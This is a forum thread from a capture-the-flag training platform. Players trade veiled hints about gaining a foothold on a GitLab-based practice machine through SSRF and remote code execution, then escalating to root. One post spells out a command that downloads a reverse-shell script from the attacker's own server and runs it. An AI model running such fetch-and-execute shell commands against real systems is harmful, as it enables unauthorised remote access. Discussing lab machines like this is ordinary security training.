Official Laboratory Discussion

Spoiler Removed

Hi Guys, There must be another trick than using R**** C******.

Type your comment> @mohsinhakak said:

Whoops, GitLab is taking too much time to respond. been like this for days, any information on how to get rid of this please PM , thanks

Same here, it worked great for me before

Hnmm I leaked the secret, but I canā€™t get r*** to run my payload. I tried adding spaces to remove ='s as 0xc45 suggested but still no luck. Any tips?

Stuck on the foothold. Iā€™ve found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but havenā€™t found a way to turn this into anything yet. Searched for CVEs but havenā€™t found any that are useful. As usual I may have missed something obvious?

Rooted :wink:

That was an easy box?
I donā€™t think soā€¦
Thanks, @n3ph0s for the nudge on foothold.

Feel free to PM if any help is needed.

guys im stuck in the beginning can someone dm me a hint to start with, i did a service scan and i canā€™t get anywhere around the website

Rooted!

why am i so distracted and overlook things???
Contrary to everyone, the user was easier than the root !

Might be luck but, things just went the right path (even not using docker prior to this)ā€¦

foot:

  • look carefully (enumeration)
  • Some things (doā€¦ cofā€¦ mains) are just a pot full of honeyā€¦
  • find the version and build piece by piece with that (find that POC)
  • When exploiting, if the payload fails, check what was said about the ā€œ=ā€ symbols (i did not had that issue tho)
  • remember what was, also, said, the machine might not have the bins you want/need

user:

  • It was already mentioned (if you cant crack/find, just hammer the guts and reset the machine!)

root:

  • Enum (latest) might help you over Peas on this one
  • when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it

If nudges needed, honk the horn on pm

Thought Iā€™d have a nice little time on this box, but it seems to be 502ā€™ing everything for me after stops/starts/resets :frowning:

Edit: I had to change servers for it to work.

Actually got a shell but no idea about how to find the user flag.

Please send me some nudges.

Iā€™ve reached the gi**ab page, registered an account, discovered the L_I, but canā€™t undestand how to get R_E, iā€™ve read about ss*f but it says import url is blocked, am i on the right path? iā€™m blocked ā€¦

Spoiler Removed

This box made me sweat, there are still some mysteries that I have not solved, why some payload works for one person is not the other ā€¦

I spent a lot of time setting up the env

it is not an easy box for me

if you need help PM

Yikes, this is not an easy box for me.

I thought I had some plain ruby working for generating the payload, but itā€™s just not accepted. The ā€˜otherā€™ more convoluted doc*** route has also failed to generate a payload which works.

Hint for those struggling with a foothold: If you get a ā€œSomething went wrongā€ error, try a different bin

What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems

this approach got me good: wget ā€œyourserver/rev.shā€ && chmod +x rev.sh && ./rev.sh

trying the bash rev shell directly did not worked for me and the one i said above was reliable all the times (used it like 6 times due to resets and stuff)

Having zero luck getting the payload to hit a local web server. This one has bested me.

Type your comment> @trcm said:

Having zero luck getting the payload to hit a local web server. This one has bested me.

how you generating it??

I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.

Ahha, progress. I had to add ā€œā€“timeout=3 --tries=1ā€ as wget wasnā€™t reaching my web service and was executing in place on the rails console borking the erb instance it seems.